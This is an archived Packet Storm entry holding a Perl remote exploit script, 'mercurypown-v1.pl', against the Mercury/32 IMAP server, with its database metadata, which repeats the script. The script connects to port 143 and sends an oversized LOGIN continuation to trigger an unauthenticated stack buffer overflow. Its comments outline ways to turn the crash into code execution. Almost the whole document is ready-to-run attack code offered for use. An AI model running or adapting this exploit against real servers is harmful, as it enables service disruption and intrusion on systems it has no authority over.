ID PACKETSTORM:54937 Type packetstorm Reporter mu-b Modified 2007-03-09T00:00:00
Description
`#!/usr/bin/perl
#
# mercurypown-v1.pl
#
# Mercury/32 <v4.01b (win32) remote exploit
# by mu-b - 28 Nov 2006
#
# - Tested on: Mercury/32 v4.01a (win32)
# Mercury/32 v4.01b (win32)
#
# Stack-based buffer overflow caused by Mercury/32 concatenating
# continuation data into a fixed sized buffer disregarding
# the length of the original command, you do not require authentication.
#
# This is a little harder to exploit than usual since the
# stack frame in question calls end_thread before returning..
# buts it's still possible by at *least* two different ways...
# (i.e. controlling a pointer into sprintf and/or controlling
# a pointer to be free()).
#
########
use Getopt::Std; getopts('t:n:', \%arg);
use Socket;
&print_header;
my $target;
if (defined($arg{'t'})) { $target = $arg{'t'} }
if (!(defined($target))) { &usage; }
my $imapd_port = 143;
my $send_delay = 1;
my $NOP = 'A';
my $LEN = 9200;#8928;
my $BUFLEN = 8192;
if (connect_host($target, $imapd_port)) {
print("-> * Connected\n");
$buf = "1 LOGIN".(" "x($LEN-$BUFLEN))."\{255\}\n";
send(SOCKET, $buf, 0);
sleep($send_delay);
print("-> * Sending payload\n");
$buf = $NOP x 255;
send(SOCKET, $buf, 0);
sleep($send_delay);
print("-> * Sending payload 2\n");
$buf = $NOP x $BUFLEN;
send(SOCKET, $buf, 0);
sleep($send_delay);
print("-> * Successfully sent payload!\n");
}
sub print_header {
print("Mercury/32 <v4.01b (win32) remote exploit\n");
print("by: <mu-b\@digit-labs.org>\n\n");
}
sub usage {
print(qq(Usage: $0 -t <hostname>
-t <hostname> : hostname to test
));
exit(1);
}
sub connect_host {
($target, $port) = @_;
$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
return(1337);
}
`
{"type": "packetstorm", "published": "2007-03-09T00:00:00", "reporter": "mu-b", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "147cf471f2145fbb74c3c5f4e8cd40f1"}, {"key": "modified", "hash": "10f8942b49a73e00d537e1a2b5ad2294"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "10f8942b49a73e00d537e1a2b5ad2294"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "8b49420069041b40ada7a0b8795c0fec"}, {"key": "sourceData", "hash": "5f4604d6884e76ca4e9cef34a8976508"}, {"key": "sourceHref", "hash": "2ae6d4feb8f9e731d6def790a9cfd75c"}, {"key": "title", "hash": "99b3617d7ac25c13d9ebd614a52baaeb"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`#!/usr/bin/perl \n# \n# mercurypown-v1.pl \n# \n# Mercury/32 <v4.01b (win32) remote exploit \n# by mu-b - 28 Nov 2006 \n# \n# - Tested on: Mercury/32 v4.01a (win32) \n# Mercury/32 v4.01b (win32) \n# \n# Stack-based buffer overflow caused by Mercury/32 concatenating \n# continuation data into a fixed sized buffer disregarding \n# the length of the original command, you do not require authentication. \n# \n# This is a little harder to exploit than usual since the \n# stack frame in question calls end_thread before returning.. \n# buts it's still possible by at *least* two different ways... \n# (i.e. controlling a pointer into sprintf and/or controlling \n# a pointer to be free()). \n# \n######## \n \nuse Getopt::Std; getopts('t:n:', \\%arg); \nuse Socket; \n \n&print_header; \n \nmy $target; \n \nif (defined($arg{'t'})) { $target = $arg{'t'} } \nif (!(defined($target))) { &usage; } \n \nmy $imapd_port = 143; \nmy $send_delay = 1; \n \nmy $NOP = 'A'; \nmy $LEN = 9200;#8928; \nmy $BUFLEN = 8192; \n \nif (connect_host($target, $imapd_port)) { \nprint(\"-> * Connected\\n\"); \n$buf = \"1 LOGIN\".(\" \"x($LEN-$BUFLEN)).\"\\{255\\}\\n\"; \nsend(SOCKET, $buf, 0); \nsleep($send_delay); \n \nprint(\"-> * Sending payload\\n\"); \n$buf = $NOP x 255; \nsend(SOCKET, $buf, 0); \nsleep($send_delay); \n \nprint(\"-> * Sending payload 2\\n\"); \n$buf = $NOP x $BUFLEN; \nsend(SOCKET, $buf, 0); \nsleep($send_delay); \n \nprint(\"-> * Successfully sent payload!\\n\"); \n} \n \nsub print_header { \nprint(\"Mercury/32 <v4.01b (win32) remote exploit\\n\"); \nprint(\"by: <mu-b\\@digit-labs.org>\\n\\n\"); \n} \n \nsub usage { \nprint(qq(Usage: $0 -t <hostname> \n \n-t <hostname> : hostname to test \n)); \n \nexit(1); \n} \n \nsub connect_host { \n($target, $port) = @_; \n$iaddr = inet_aton($target) || die(\"Error: $!\\n\"); \n$paddr = sockaddr_in($port, $iaddr) || die(\"Error: $!\\n\"); \n$proto = getprotobyname('tcp') || die(\"Error: $!\\n\"); \n \nsocket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die(\"Error: $!\\n\"); \nconnect(SOCKET, $paddr) || die(\"Error: $!\\n\"); \nreturn(1337); \n} \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:18:42", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/54937/mercurypown-v1.pl.txt.html", "sourceHref": "https://packetstormsecurity.com/files/download/54937/mercurypown-v1.pl.txt", "title": "mercurypown-v1.pl.txt", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "dependencies": {"references": [], "modified": "2016-11-03T10:18:42"}, "vulnersScore": 7.5}, "references": [], "id": "PACKETSTORM:54937", "hash": "e6b908f319b48f5db3e098e582c4a23fd8d86b716d47e27ebb60b9b9dcb493cc", "edition": 1, "cvelist": [], "modified": "2007-03-09T00:00:00", "description": ""}
